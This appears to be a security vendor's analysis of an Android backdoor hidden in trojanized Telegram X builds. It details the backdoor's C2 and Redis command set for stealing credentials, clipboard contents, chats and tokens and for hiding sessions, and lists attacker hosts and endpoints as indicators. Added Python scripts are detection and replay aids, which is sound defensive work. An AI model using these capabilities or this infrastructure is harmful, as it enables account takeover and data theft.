Keypoints
- Baohuo is distributed through modified Telegram X builds and third-party app catalogs.
- It can steal logins, passwords, chat histories, and clipboard data.
- It can conceal devices and chats, and manage channel subscriptions on behalf of victims.
- The attackers use a Redis-backed command channel in addition to C2 for issuing tasks and updates.
- The backdoor is implanted in three ways (compiled into the main DEX, applied as an LSPatch patch, or loaded at run time from a separate DEX in the resources) and alters Telegram X behaviour through Xposed hooks and pre-built “mirrors” of the messenger’s methods.
MITRE Techniques
- [T1660] Phishing – Delivery via in-app ads that redirect to malicious sites to download the trojan APK. ‘The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.’
- [T1407] Download New Code at Runtime – The backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool. ‘the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool.’
- [T1603] Scheduled Task/Job – The backdoor schedules commands and periodic checks. ‘every minute, request commands in the same format as the commands from the Redis database.’
- [T1604] Proxy Through Victim – Infected devices are connected to an intranet and turned into a proxy for Internet access. ‘connect infected devices to their internal network (intranet), and turn them into a proxy for accessing the Internet.’
- [T1517] Access Notifications – The backdoor can block or manipulate notifications. ‘block notifications from blacklisted chats for a specified time;’
- [T1414] Clipboard Data – The backdoor intercepts and uploads clipboard contents. ‘upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;’
- [T1418] Software Discovery – The backdoor gathers software information. ‘/tg/query/allPackages — upload information about all installed programs to the C2 server;’
- [T1636.004] SMS Messages – The trojan uploads SMS messages. ‘upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;’
- [T1636.003] Contact List – The trojan uploads contacts. ‘upload user phonebook contacts to the C2 server’ (via API /api/AppCallback/Contacts)
- [T1646] Exfiltration Over C2 Channel – Data is exfiltrated through the C2 channel. ‘upload information from the Telegram X databases that store chat history, messages, and other confidential data;’
- [T1640] Account Access Removal – The backdoor terminates the current Telegram session. ‘terminate the user’s current authorized Telegram login session on the infected device;’
- [T1437] Application Layer Protocol – C2 communications occur over application-layer protocols. ‘The backdoor communicates with the C2 server via API calls.’
- [T1655] Masquerading – The trojan masquerades as legitimate Telegram X. ‘The modified Telegram X with Android.Backdoor.Baohuo.1.origin implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer.’
- [T1655.001] Match Legitimate Name or Location – The malicious app is presented under the legitimate Telegram X identity. ‘distributed through APKPure on behalf of the messenger’s genuine developer’
Indicators of Compromise
- [Domain] C2 server – hpncallback.gold5play.com
- [Domain] NPS configuration server – sdk-nps.ips5.info
- [IP Address] Redis command server – 159.138.237.10:33619
- [IP Address] NPS server from the test configuration – 172.10.10.10 (placeholder value; the analysed sample did not connect to it)
- [SHA1] File hash – 4410f69099a037a25e5976df04a91cee7dbfac14
- [Package Name] Trojanized Telegram X – org.thunderdog.challegram (the genuine Telegram X package name; the trojanized build is signed with a different certificate)
- [URL] Distribution sources – https://apkpure.com, https://apksum.com (the report also names the AndroidP catalog)
October 23, 2025
Doctor Web has identified a dangerous backdoor, Android.Backdoor.Baohuo.1.origin, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, Android.Backdoor.Baohuo.1.origin can conceal connections from third-party devices in the list of active Telegram sessions. Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, also concealing these actions. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with Android.Backdoor.Baohuo.1.origin has exceeded 58,000.
Android.Backdoor.Baohuo.1.origin started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.
These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertising text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window), as well as by reviews from supposedly happy users that the threat actors actually composed. It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.

One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating
Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.
Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of Android.Backdoor.Baohuo.1.origin. At the same time, the total number of infected devices has exceeded 58,000. Around 3,000 different models of smartphones, tablets, TV boxes, and even cars with Android-based on-board computers have been infected.

Countries with the highest number of devices infected with Android.Backdoor.Baohuo.1.origin (according to Doctor Web’s anti-virus laboratory)
However, malicious websites are not the only source for Android.Backdoor.Baohuo.1.origin’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. We have notified the online platforms where the trojanized versions of Telegram X were found.

The modified Telegram X with Android.Backdoor.Baohuo.1.origin implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer
Doctor Web’s anti-virus laboratory discovered several Android.Backdoor.Baohuo.1.origin variations, which can be conditionally divided into 3 main modification groups:
- versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;
- versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;
- versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.
Regardless of the modification type, Android.Backdoor.Baohuo.1.origin initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.
When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.
Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.
If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.
The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to Android.Backdoor.Baohuo.1.origin the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. This is the first known case of using Redis to control Android malware.
When launched, Android.Backdoor.Baohuo.1.origin connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.
Android.Backdoor.Baohuo.1.origin regularly connects to the C2 server via API requests and can receive the following tasks:
- upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;
- upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;
- receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;
- receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);
- request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);
- request an URL from the C2 server to download an update for Telegram X;
- request from the C2 server a configuration which is then saved as a JSON file;
- request information about the Redis database;
- upload information about the device to the C2 server whenever messenger network activity is detected;
- receive from the C2 server a list of bots that are to be added to the Telegram contact list;
- upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
- every minute, request commands in the same format as the commands from the Redis database.
To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. The malicious program can receive the following commands:
- create a blacklist of chats that will not be displayed in the Telegram X window;
- conceal specified devices from the user in the list of authorized devices for their account;
- block notifications from blacklisted chats for a specified time;
- display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);
- send the C2 server information about all of the installed apps;
- terminate the user’s current authorized Telegram login session on the infected device;
- display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
- remove the Telegram Premium icon in the app’s interface for the current user;
- upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;
- subscribe the user to a specified Telegram channel;
- leave a specified Telegram channel;
- join a specified Telegram channel on behalf of the user, using the provided URL;
- obtain the list of devices authorized in Telegram;
- request the user’s authentication token and upload it to the C2 server.
It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. The trojan will intercept this information from the clipboard and send it to the malicious actors.
Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of Android.Backdoor.Baohuo.1.origin, so this malware does not pose a threat to our users.
More details about Android.Backdoor.Baohuo.1.origin
Indicators of compromise
Android.Backdoor.Baohuo.1.origin
Added to the Dr.Web virus database: 2025-08-01
Virus description added: 2025-10-23
sha1:
- 4410f69099a037a25e5976df04a91cee7dbfac14 (org.thunderdog.challegram)
Description
A backdoor for Android-based devices. Threat actors embedded it into a copy of the original version of the Telegram X messenger. It executes the attackers’ commands and allows them to steal victims’ confidential data and gain full control over their Telegram accounts. Android.Backdoor.Baohuo.1.origin is distributed through malicious websites and has also been detected in some third-party Android app catalogs.
Operating routine
There are several Android.Backdoor.Baohuo.1.origin versions, which differ in how they are implanted into the Telegram X app. These are the main modification types:
- the backdoor is embedded into the main executable DEX file of the messenger;
- the backdoor, in the form of a patch, is dynamically injected into the main executable DEX file using the LSPatch tool;
- the backdoor is located in the app’s resources directory as a separate DEX file and is loaded dynamically.
In all of the modifications, the call for the malicious code initialization method is located in the class ApplicationLoader, which lets Android.Backdoor.Baohuo.1.origin run as soon as the messenger launches. At the same time, the original app remains functional and appears harmless to the user.
Interaction with Telegram X
Android.Backdoor.Baohuo.1.origin alters Telegram X’s behaviour at the code level in two ways: through the Xposed framework and through “mirrors” of the messenger’s methods that the malicious actors have prepared. When the backdoor needs to perform an action that is not standard for the program (such as concealing certain chats or authorized devices in the interface), it uses Xposed hooks, which replace the behaviour of the relevant methods at run time.
If the action does not require intervention in the app’s logic, the backdoor calls the original methods through the mirrors alone.
An example of a mirror:
com.ucreator.tgjar.reflect.mirror.org.telegram.tgnet.TLRPC.TL_inputChannel
To call a required method, Android.Backdoor.Baohuo.1.origin derives the name of the target class from the mirror’s own name as follows.
- The package path that follows the mirror segment is read (for the example above, the result is org.telegram.tgnet);
- The name of the mirrored class is read (for the example above, the result is TLRPC.TL_inputChannel);
- The mirror’s getName() method returns the two strings joined with a dot: org.telegram.tgnet.TLRPC.TL_inputChannel.
The class is then resolved by reflection and the required method is invoked on it.
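The following script is an added example and is not code from Doctor Web or from the backdoor. It applies the mirror-naming rule described above to a list of class names such as jadx or dexdump would print for a suspicious Telegram X build, and reports which messenger classes the mirrors stand for. The class list is constructed for the demo (only the first mirror is the one quoted in the report), and the rule for telling package segments from class segments (lower-case packages, capitalized classes) is an assumption about Java naming, not something the report states.

```python
import re

# Added example, not Doctor Web's code or the backdoor's: resolves the Telegram X
# class behind a Baohuo "mirror" class name using the naming rule in the report.
MIRROR_MARKER = ".mirror."
# Namespace the report's mirrors live in; other "...mirror..." hits are merely suspicious.
BAOHUO_MIRROR_NAMESPACE = "com.ucreator.tgjar.reflect.mirror."

# Assumption (Java convention, not from the report): package segments are lower-case
# identifiers, and the first segment that is not one starts the class path.
_PACKAGE_SEGMENT = re.compile(r"^[a-z_][a-z0-9_]*$")


def split_mirror(mirror_name: str) -> tuple:
    """Return (package, class_path) for a mirror class name.

    "...mirror.org.telegram.tgnet.TLRPC.TL_inputChannel" yields
    ("org.telegram.tgnet", "TLRPC.TL_inputChannel"), the two strings
    the report says getName() concatenates.
    """
    _, marker, tail = mirror_name.partition(MIRROR_MARKER)
    if not marker or not tail:
        raise ValueError(f"not a mirror class name: {mirror_name!r}")
    segments = tail.split(".")
    for i, seg in enumerate(segments):
        if not _PACKAGE_SEGMENT.match(seg):
            break
    else:
        raise ValueError(f"no class segment in mirror name: {mirror_name!r}")
    if i == 0:
        raise ValueError(f"mirror name has no package part: {mirror_name!r}")
    return ".".join(segments[:i]), ".".join(segments[i:])


def resolve_mirror(mirror_name: str) -> str:
    """The Telegram X class the mirror targets, as getName() would return it."""
    package, class_path = split_mirror(mirror_name)
    return f"{package}.{class_path}"


def jvm_binary_name(mirror_name: str) -> str:
    """Same target as Class.forName() and smali spell it (inner classes joined with '$'),
    which is the form to grep for in a decompiled APK."""
    package, class_path = split_mirror(mirror_name)
    return f"{package}.{class_path.replace('.', '$')}"


def find_mirrors(class_names) -> dict:
    """Map every resolvable mirror class in a class list to the messenger class it stands for."""
    hits = {}
    for name in class_names:
        if MIRROR_MARKER not in name:
            continue
        try:
            hits[name] = resolve_mirror(name)
        except ValueError:
            continue  # e.g. a truncated name with no class part
    return hits


# Constructed class list: the first mirror is quoted in the report, the second is
# hypothetical, the others are ordinary classes or an incomplete name that must be skipped.
SAMPLE_CLASSES = [
    "org.thunderdog.challegram.Log",
    "org.telegram.messenger.ApplicationLoader",
    "com.ucreator.tgjar.reflect.mirror.org.telegram.tgnet.TLRPC.TL_inputChannel",
    "com.ucreator.tgjar.reflect.mirror.org.telegram.messenger.MessagesController",  # hypothetical
    "com.ucreator.tgjar.reflect.mirror.org.telegram.tgnet",  # no class segment, skipped
]

if __name__ == "__main__":
    for mirror, target in find_mirrors(SAMPLE_CLASSES).items():
        print(f"{mirror}\n  -> {target}  (binary name {jvm_binary_name(mirror)})")
```

Feeding it the full class list of a sample gives an inventory of which Telegram X internals the backdoor reaches through mirrors, which is a quick way to compare variants without reading every reflective call.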
The controlling mechanism
Commands are sent to the backdoor in two ways:
- via the C2 server;
- via the Redis database.
Earlier Android.Backdoor.Baohuo.1.origin versions were controlled only via the C2 server.
The commands and responses to them are sent in JSON format.
Android.Backdoor.Baohuo.1.origin has a built-in configuration with various parameters, including the addresses for:
- the C2 server;
- the Redis database;
- the NPS server.
When launched, the backdoor receives an updated configuration from the current C2 server. It then uses this configuration to connect to the attackers’ Redis database. Upon successfully connecting to the database, the trojan receives the current C2 server and NPS server addresses.
HTTP and HTTPS protocols are used to communicate with the C2 server and the NPS server.
The NPS server
The NPS server is used to connect infected devices to the attackers’ internal network (intranet), which allows these devices to be used as a proxy for accessing the Internet and for redirecting traffic. The network is built on the open-source nps tunnelling proxy (https://github.com/ehang-io/nps), and a corresponding client is built into the backdoor.
To launch the NPS client, Android.Backdoor.Baohuo.1.origin sends a request to sdk-nps[.]ips5[.]info to get a configuration with the parameters required to connect to the NPS server. At the time of the analysis, the backdoor did not connect to the server and only received a test configuration:
{
"msg": "\u64cd\u4f5c\u6210\u529f",
"authKey": "TestAuthKey",
"password": "123456",
"code": 0,
"port": "8090",
"ip": "172[.]10[.]10[.]10",
"user": "user"
}
The msg field is the JSON-escaped Chinese string 操作成功 (“operation successful”); the placeholder authKey, password and user values are consistent with this being a test configuration rather than a live one.
The C2 server
The backdoor communicates with the C2 server (hpncallback[.]gold5play[.]com) via API calls. Through them, it sends the collected data to the malicious actors and informs them when commands have been executed successfully. The following API calls are used:
- /api/AppCallback/SMS — to upload incoming SMS to the C2 server;
- /api/AppCallback/Contacts — to upload user phonebook contacts to the C2 server;
- /api/Callback/EncryptionData — to upload the clipboard contents to the C2 server when the messenger is minimized and returned to its window (the method onResume of the app is hooked to track this event);
- /api/Callback/GetLoadParams — to obtain an URL from the C2 server in order to display ads and to obtain the server address for downloading the trojan’s update in the form of a DEX executable file;
- /api/Callback/GetSecretKey — to obtain encryption keys that are used when certain data is uploaded to the C2 server (for example, the clipboard contents);
- /api/Callback/TgCheckReportDataCallback — to request a group of commands for collecting information about installed apps, message history, and contacts from the device’s phonebook, and about devices logged into Telegram (this request is performed every 30 minutes);
- /api/Callback/TgCheckUpdateApp — to request an URL from the C2 server to download an update for Telegram X. When the update is installed, /api/Callback/TgInstallEventCallback is called to report on the task’s successful execution;
- /api/Callback/TgKeepAliveStrategyCallback — to request from the C2 server a configuration that is then saved as a JSON file. For example:
{"switch1":false,"switch2":false,"switch3":true,"switch4":true,"switch5":false,"intervalTime":30}
The trojan only uses the intervalTime variable, which determines how much time must pass before the configuration is requested again;
- /api/Callback/TgRedisStatusChange — to request information about the Redis database;
- /api/Callback/TgRegisterPropertyCallback — to upload device information to the C2 server (executed whenever the messenger sends network packets);
- /api/Xcallback/GetRobots — to obtain a list of bots that are then added to the Telegram contacts list;
- /api/callback/TgHeartCallback — it is called every 3 minutes to upload the following data to the C2 server: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
- /api/callback/TgGetTask — it is called every minute to request a command in the same format as the commands from Redis.
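The task list above and the earlier summary of C2 requests describe a fixed set of API paths and two regular beacons (TgHeartCallback every 3 minutes, TgGetTask every minute). The script below is an added example, not Doctor Web’s tooling, that turns those facts into a detection over web-proxy logs: it matches the report’s paths case-insensitively (the backdoor itself mixes Callback, callback and Xcallback), matches the report’s hosts on any path, and measures the beacon cadence per client. The log format, client addresses, timestamps and the 203.0.113.7 host are constructed for the demo; because the Redis channel can re-point the C2 address, a known path on an unknown host is still treated as a hit.

```python
from datetime import datetime

# Added example, not Doctor Web's code: Baohuo C2 detection over proxy log lines
# using the API paths, hosts and beacon intervals given in the report.

BAOHUO_PATHS = {  # lower-cased paths from the report
    "/api/appcallback/sms": "SMS upload",
    "/api/appcallback/contacts": "contacts upload",
    "/api/callback/encryptiondata": "clipboard upload",
    "/api/callback/getloadparams": "ad URL / DEX update source",
    "/api/callback/getsecretkey": "encryption keys",
    "/api/callback/tgcheckreportdatacallback": "collection command group (30 min)",
    "/api/callback/tgcheckupdateapp": "Telegram X update URL",
    "/api/callback/tginstalleventcallback": "update installed",
    "/api/callback/tgkeepalivestrategycallback": "keep-alive config",
    "/api/callback/tgredisstatuschange": "Redis info",
    "/api/callback/tgregisterpropertycallback": "device info",
    "/api/xcallback/getrobots": "bot list",
    "/api/callback/tgheartcallback": "heartbeat (3 min)",
    "/api/callback/tggettask": "task poll (1 min)",
    "/api/callback/tgcommandcallback": "command result",
    "/api/callback/tgreceptioncommandcallback": "command receipt",
}
BAOHUO_HOSTS = {"hpncallback.gold5play.com", "sdk-nps.ips5.info"}  # from the report


def parse_line(line: str):
    """'<iso-time> <client> <method> <host> <path>' -> dict, or None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, host, path = parts
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return {"time": when, "client": client, "method": method,
            "host": host.lower(), "path": path.split("?", 1)[0].lower()}


def match_baohuo(lines):
    """Return the entries that look like Baohuo C2/NPS traffic, each with a reason."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        if entry["path"] in BAOHUO_PATHS:
            entry["reason"] = "path: " + BAOHUO_PATHS[entry["path"]]
        elif entry["host"] in BAOHUO_HOSTS:
            entry["reason"] = "host: known Baohuo infrastructure"
        else:
            continue
        hits.append(entry)
    return hits


def beacon_intervals(hits, client: str, path: str):
    """Seconds between successive requests from one client to one endpoint."""
    times = sorted(h["time"] for h in hits if h["client"] == client and h["path"] == path)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def is_periodic(intervals, expected: float, tolerance: float = 0.2) -> bool:
    """True when at least two intervals exist and all lie within +-tolerance of expected."""
    return len(intervals) >= 2 and all(abs(i - expected) <= expected * tolerance for i in intervals)


# Constructed proxy log: one device beaconing as the report describes, plus noise.
SAMPLE_LOG = [
    "2025-10-20T10:00:00Z 10.0.0.5 POST hpncallback.gold5play.com /api/callback/TgHeartCallback",
    "2025-10-20T10:00:00Z 10.0.0.5 POST hpncallback.gold5play.com /api/callback/TgGetTask",
    "2025-10-20T10:00:07Z 10.0.0.5 GET sdk-nps.ips5.info /",
    "2025-10-20T10:00:30Z 10.0.0.9 GET core.telegram.org /api",
    "2025-10-20T10:01:00Z 10.0.0.5 POST hpncallback.gold5play.com /api/callback/TgGetTask",
    "2025-10-20T10:02:00Z 10.0.0.5 POST hpncallback.gold5play.com /api/callback/TgGetTask",
    "2025-10-20T10:03:00Z 10.0.0.5 POST hpncallback.gold5play.com /api/callback/TgHeartCallback",
    "2025-10-20T10:06:00Z 10.0.0.5 POST 203.0.113.7 /api/Callback/TgHeartCallback",  # re-pointed C2
    "this line is not a log entry",
]

if __name__ == "__main__":
    hits = match_baohuo(SAMPLE_LOG)
    for h in hits:
        print(h["time"].isoformat(), h["client"], h["host"], h["path"], "-", h["reason"])
    heartbeat = beacon_intervals(hits, "10.0.0.5", "/api/callback/tgheartcallback")
    print("heartbeat intervals:", heartbeat, "periodic:", is_periodic(heartbeat, 180))
```

The cadence check matters more than the host list: the host can be rotated through Redis, whereas the 60-second and 180-second timers are baked into the sample, so a client that hits any of these paths at those intervals deserves a look even when the host is new.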
Control via Redis
To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server (159[.]138.237[.]10:33619), where it registers its own sub-channel linked to the infected device. Malicious actors connect to this sub-channel and post tasks in it, which are then executed by the backdoor. The following commands are supported:
- /tg/hideChats/setBlackList and /tg/hideChats/getBlackList — create the blacklist for chats that will not be displayed to the user in the Telegram X interface;
- /tg/hideDevice/setDeviceBlackList and /tg/hideDevice/getDeviceBlackList — conceal specified devices from the user in the list of authorized devices for their account;
- /tg/serviceNotifications/startBlock and /tg/serviceNotifications/queryBlock — block notifications from the blacklisted chats from the list setBlackList for a specified time;
- /tg/dialog/showUpdateApp — display a window with information about the Telegram X update (when users click it, they are redirected to a targeted website);
- /tg/query/allPackages — upload information about all installed programs to the C2 server;
- /tg/terminated/session — terminate the user’s current authorized Telegram session on the infected device;
- /tg/dialog/showInstallApp — display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
- /tg/hidePremium/setFlag and /tg/hidePremium/getFlag — to remove the Telegram Premium icon in the app’s interface for the current user;
- /tg/db/queryContactsByUsers — upload to the C2 server information from the Telegram X database that stores user contacts;
- /tg/db/queryDialogsByChats — automatically upload to the C2 server information from the Telegram X database that stores message history;
- /tg/db/messagesStorageRawQuery — in accordance with the SQL queries specified in the command, upload to the C2 server information from the Telegram X database that stores message history;
- /tg/channel/join — subscribe the user to a specified Telegram channel;
- /tg/channel/leaveChannel — leave a specified Telegram channel;
- /tg/channel/addByLink — join a specified Telegram channel on behalf of the user, using the provided URL;
- /tg/settings/getDevices — obtain the list of devices authorized in Telegram;
- /tg/captcha/token — request a user authentication token and upload it to the C2 server.
An example of the command:
{"cmd":20000,"path":"/tg/captcha/token","serial_no":"5228e35ac6834e57856a230e507b4b94","callback":"hxxps[:]//hpncallback[.]gold5play[.]com/api/callback/TgCommandCallback","param":{"key_id":"6LflQ8EqAAAAAE3JaczP-gBVVObsFsSe2U7yZJ6O","action":"signup","currentAccount":0,"resultType":0}}
If the value of the cmd variable differs from 20000, the command will not be executed.
The value of the serial_no variable represents the command’s serial number that is saved before its execution. If a command with such a number has been received before, the flag duplicate is set, and the corresponding information is uploaded to the C2 server via the API call /api/callback/TgReceptionCommandCallback, together with information about the device. Thus, this variable is used to report that the backdoor has successfully received the task.
The value of the variable path is the command name. Each command is linked to a certain class; depending on this name, the backdoor uses the required class.
The value of the variable param is a JSON object with the parameters for an object of the required class.
The value of the variable callback is the server address to which the packet reporting on the command’s successful execution will be sent.
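The envelope handling described above (the cmd gate, the serial_no duplicate flag, dispatch by path, and the callback address) is straightforward to reproduce, which is useful when replaying captured Redis or TgGetTask messages in a sandbox. The following parser is an added example and is not Doctor Web’s code or the backdoor’s; the handlers only validate and describe parameters and perform no Telegram action. The parameter keys for /tg/captcha/token come from the report’s example; the sql key assumed for /tg/db/messagesStorageRawQuery and the second sample command are hypothetical. The refang helper exists only so the defanged URL quoted in the report can be parsed as written.

```python
import json
from urllib.parse import urlparse

# Added example, not Doctor Web's code or the backdoor's: parses the command
# envelope documented in the report the way the backdoor is described to.

EXPECTED_CMD = 20000  # any other value: the command is not executed

# Expected parameter keys per path. Captcha keys are from the report's sample;
# "sql" for messagesStorageRawQuery is an assumed name (the report only says
# the command carries SQL queries).
PARAM_SCHEMAS = {
    "/tg/captcha/token": {"key_id", "action", "currentAccount", "resultType"},
    "/tg/db/messagesStorageRawQuery": {"sql"},  # hypothetical key name
    "/tg/query/allPackages": set(),
    "/tg/terminated/session": set(),
}


def refang(url: str) -> str:
    """Undo hxxp / [:] / [.] defanging so urlparse can read a URL quoted from a report."""
    return url.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


class CommandProcessor:
    """Keeps the serial numbers already seen, as the report says the backdoor does."""

    def __init__(self):
        self.seen_serials = set()

    def process(self, raw: str) -> dict:
        try:
            msg = json.loads(raw)
        except json.JSONDecodeError as exc:
            return {"status": "malformed", "error": str(exc)}
        if msg.get("cmd") != EXPECTED_CMD:
            return {"status": "ignored", "reason": f"cmd={msg.get('cmd')!r}"}

        serial = str(msg.get("serial_no", ""))
        duplicate = serial in self.seen_serials  # the flag TgReceptionCommandCallback reports
        self.seen_serials.add(serial)
        receipt = {"serial_no": serial, "duplicate": duplicate}

        path = msg.get("path", "")
        schema = PARAM_SCHEMAS.get(path)
        if schema is None:
            return {"status": "unknown_path", "path": path, "receipt": receipt}

        param = msg.get("param") or {}
        missing = sorted(schema - set(param))
        callback_host = urlparse(refang(msg.get("callback", ""))).hostname
        return {
            "status": "executed" if not missing else "bad_params",
            "path": path,
            "missing": missing,
            "receipt": receipt,
            "callback_host": callback_host,
        }


# The command quoted in the report (defanged as printed there).
SAMPLE_COMMAND = (
    '{"cmd":20000,"path":"/tg/captcha/token",'
    '"serial_no":"5228e35ac6834e57856a230e507b4b94",'
    '"callback":"hxxps[:]//hpncallback[.]gold5play[.]com/api/callback/TgCommandCallback",'
    '"param":{"key_id":"6LflQ8EqAAAAAE3JaczP-gBVVObsFsSe2U7yZJ6O","action":"signup",'
    '"currentAccount":0,"resultType":0}}'
)
# Hypothetical second command with the SQL parameter left out.
SAMPLE_BAD_COMMAND = (
    '{"cmd":20000,"path":"/tg/db/messagesStorageRawQuery","serial_no":"0001",'
    '"callback":"hxxps[:]//hpncallback[.]gold5play[.]com/api/callback/TgCommandCallback","param":{}}'
)

if __name__ == "__main__":
    proc = CommandProcessor()
    for raw in (SAMPLE_COMMAND, SAMPLE_COMMAND, SAMPLE_BAD_COMMAND, '{"cmd":1,"path":"/tg/x"}'):
        print(json.dumps(proc.process(raw)))
```

Replaying the same message twice shows the duplicate flag flipping on the second pass, and a command with cmd other than 20000 is dropped before its serial number is even recorded.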
MITRE matrix
| Stage | Technique |
|---|---|
| Initial access | Phishing (T1660) |
| Execution | Command and Scripting Interpreter: Unix Shell (T1623.001); Scheduled Task/Job (T1603) |
| Persistence | Event Triggered Execution (T1624); Broadcast Receivers (T1624.001); Foreground Persistence (T1541); Scheduled Task/Job (T1603) |
| Privilege Escalation | Abuse Elevation Control Mechanism (T1626) |
| Defense Evasion | Download New Code at Runtime (T1407); Foreground Persistence (T1541); Masquerading (T1655); Match Legitimate Name or Location (T1655.001); Proxy Through Victim (T1604) |
| Credential Access | Access Notifications (T1517); Clipboard Data (T1414) |
| Discovery | Location Tracking (T1430); Software Discovery (T1418); System Information Discovery (T1426); System Network Configuration Discovery (T1422); Internet Connection Discovery (T1422.001) |
| Data Collection | Access Notifications (T1517); Clipboard Data (T1414); Data from Local System (T1533); Location Tracking (T1430); Protected User Data (T1636); Calendar Entries (T1636.001); Contact List (T1636.003); SMS Messages (T1636.004) |
| Command and Control | Application Layer Protocol (T1437); Web Protocols (T1437.001); Non-Standard Port (T1509) |
| Exfiltration | Exfiltration Over C2 Channel (T1646) |
| Impact | Account Access Removal (T1640) |